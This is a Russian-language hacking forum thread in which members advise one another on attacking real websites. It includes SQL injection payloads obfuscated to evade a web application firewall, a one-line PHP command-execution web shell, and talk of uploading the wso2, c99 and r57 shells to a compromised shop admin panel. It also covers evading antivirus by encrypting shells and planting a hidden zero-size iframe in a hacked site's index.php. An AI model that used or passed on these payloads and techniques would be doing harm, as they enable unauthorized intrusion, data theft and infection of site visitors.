Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,519
    Likes Received:
    401
    Reputations:
    196

    А зачем крутить скуль на алиасах? Алиасы на другом сервере? Если на одном, то заливай шелл и получишь доступ и к алиасам.

    А что касается фильтра, то urlencode пробуй или поиграйся с регистром букв в запросах.
     
    1 person likes this.
  2. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    WAF, судя по всему.

    Некоторые варианты из многих возможных:

    HTML:
    -9999+/*!12345union*/+/*!12345select*/+1,2,table_name,4,5+/*!12345from*/+information_schema.tables
    
    HTML:
    -9999+/*!union+select+1,2,table_name,4,5+from+information_schema.tables*/
    
    HTML:
    -9999+/*%00*/union/*%00*/+/*%00*/select/*%00*/+1,2,table_name,4,5+/*%00*/from/*%00*/+information_schema.tables
    
    HTML:
    -9999+/*!union*/+/*!select*/+1,2,table_name,4,5+/*!from*/+information_schema.tables
    
    HTML:
    -9999/*!union+select+1,2,table_name,4,5+'aaa'from+information_schema.tables*/
    
    Либо если есть возможность, то отправлять POST' ом, либо подзапросы.
     
    #14402 h00lyshit!, 8 Aug 2010
    Last edited: 12 Aug 2010
    3 people like this.
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    продолжай...
     
  4. SEWERN

    SEWERN Elder - Старейшина

    Joined:
    9 Jan 2009
    Messages:
    23
    Likes Received:
    35
    Reputations:
    26
    да , сайты на других серверах.

    Всем спасибо , попробую urlencode и варианты от Redwood.
     
  5. M.MIB

    M.MIB New Member

    Joined:
    2 Aug 2010
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Как вставить ifraim в тело index.php чтобы главная страница не умерла???
     
  6. manmerritt0

    manmerritt0 New Member

    Joined:
    31 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Всем привет! Я недавно начал изучать эту тему, поэтому прошу строго не ругать, если допущу какие-либо неточности в терминологии.

    Вобщем такой вопрос:
    Добыл доступ к админки одного маленького буржуйского шопа, нашел способ залить через нее веб шелл. Залил последнюю версию wso 2, захожу на шелл, а у меня там ограничено все, что только можно:

    Safe-mode: ON
    open_basedir, где прописан только адрес папки в которой лежит шелл + папки /tmp
    Chmod: ---------, т.е. походу вообще ничего нельзя делать

    Залил другой шелл: c99 от madnet - тоже самое.

    Залил шелл r57 от wolfa - все стало гораздо лучше:

    Safe-mode: OFF
    open_basedir - нет ограничений
    Chmod:drwxrwxrwx

    Что не так с двумя первыми шеллами? Просто имхо r57 самый неюзабельный.

    P.S. Chmod я указывал тот, что стоит рядом с адресом директории, в которую залит шелл.
     
  7. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    да н еможет быть такого что при первых двух сейф мод он а на р57 офф, это настройки сервера и накак не шелла..что то нереальное говоришь...и еще чем это неюзабельный р57? вообще самый юзабельный шелл
    <? system($_GET[cmd]); ?>
     
  8. manmerritt0

    manmerritt0 New Member

    Joined:
    31 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Ладно, отбросим вопрос о юзабельности того или иного шелла. Это дело вкуса и опыта.
    Меня больше интересует, почему ограничения при разных залитых шеллах разные. Ты говоришь, что этого не может быть, но тем не мене так есть. Меня это тоже очень сильно удивило.

    А, вот еще чем мне не нравится r57: он дико палится антивирусами, а тот же wso2 мой касперский пока не замечает.
     
  9. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    а ты его криптовать пробовал? если нет,то это и не удивительно что он у тебя палится...
     
  10. mr.celt

    mr.celt Elder - Старейшина

    Joined:
    6 Feb 2008
    Messages:
    133
    Likes Received:
    16
    Reputations:
    12
    А почему она должна умереть?))
    Находи тот участок кода, который выводит текст на страницу. Например контакты организации. И в конце строки вставляй свой iframe, только не забудь поставить width и height в ноль и visible:no.
     
  11. manmerritt0

    manmerritt0 New Member

    Joined:
    31 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Нет не пробовал. Я собственно начал учится этой теме только неделю назад. Читал много статей на тематических форумах и ни в одной из них не поднимался вопрос криптовки веб шеллов.
    Так что спасибо, буду разбираться и с этим вопросом.
     
  12. legaljo

    legaljo Member

    Joined:
    27 Jul 2010
    Messages:
    195
    Likes Received:
    26
    Reputations:
    7
    Ну может аргументацию хоть какую-нибудь чтоле?
     
  13. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Бывает что фаервол так настроен что ВСО и МАД палятца и полная жопа способов обойти пока не нашел=), а р57 работает (он кстате реально более практичный и функциональный, а то что палитца анвирам, ты его wget'ом просто на сервак, и не какой запары с криптовкой )
     
    #14413 Dare, 9 Aug 2010
    Last edited: 9 Aug 2010
  14. Star_s

    Star_s New Member

    Joined:
    4 Feb 2010
    Messages:
    24
    Likes Received:
    2
    Reputations:
    0
    manmerritt0, что ты про Safe_mode написал - такого точно не может быть. механизм получения значения "Safe_mode" одинаковый:

    $safe_mode = @ini_get('safe_mode');

    может, когда ты залил первые два шелла, safe_mode было On, а потом админ поставил в Off, и ты как раз залил r57 ) В такое я скорее поверю )
     
    1 person likes this.
  15. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    не обижайся но это бред!
     
    1 person likes this.
  16. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    мда... в r57 есть возможность обходить ограничения safe_mode, open_basedir,etc..
    читать
     
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    во всех шеллах есть методы обхода сейф мода...но не так что бы на серванте поменять..а файлы почитать, в другую папку перепрыгнуть и тд и тп... если бы шеллы могли настройки сервера менять то и рутать не надо было бы никогда
     
    1 person likes this.
  18. manmerritt0

    manmerritt0 New Member

    Joined:
    31 Jul 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    кстати, после заливки шелла буквально через 10 минут sql уязвимость, через которую были добыты пароли, исчезла. Врядли админы будут выключать safe_mod после того, как увидели уязвимость. Тем более, что у меня там сейчас залито все 3 шелла(wso2,c99,r57) и все также:на 2-х safemod on, на r57-off

    А и правда, что насчет фаерволлов и антивирусов? Я сам задумывался над этим, но информации не нашел. Может на том сервере стоят определенные средства защиты, которые по тем или иным причинам палят только wso2 и c99?



    Только что случайно заметил, что на сервере есть юзер drweb.
    Он может быть причиной таких непоняток? Но почему тогда он пропустил r57?
     
    #14418 manmerritt0, 9 Aug 2010
    Last edited: 9 Aug 2010
  19. legaljo

    legaljo Member

    Joined:
    27 Jul 2010
    Messages:
    195
    Likes Received:
    26
    Reputations:
    7
    АП. шелл отличный..
     
  20. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    я же тебе сказал продолжай крутить.крутить скулю значит что ты уже нашел багу и в процесе раскручивания уязвимости у тебя появляется надпись "hacking attempt"..это означает что там стоит какой нить фильтр..и тебе прийдется его обойти..... если конечно ты не мега кул хацкер и просто подставил ковычку и и назвал это раскручивать скуль !!!

    вопрос из разряда нубских..и я очень удивлен что твой пост еще жив ..так мало того еще и ап ему сделал...
    Но Слава Богу 1 сентября уже скоро....
     
Thread Status:
Not open for further replies.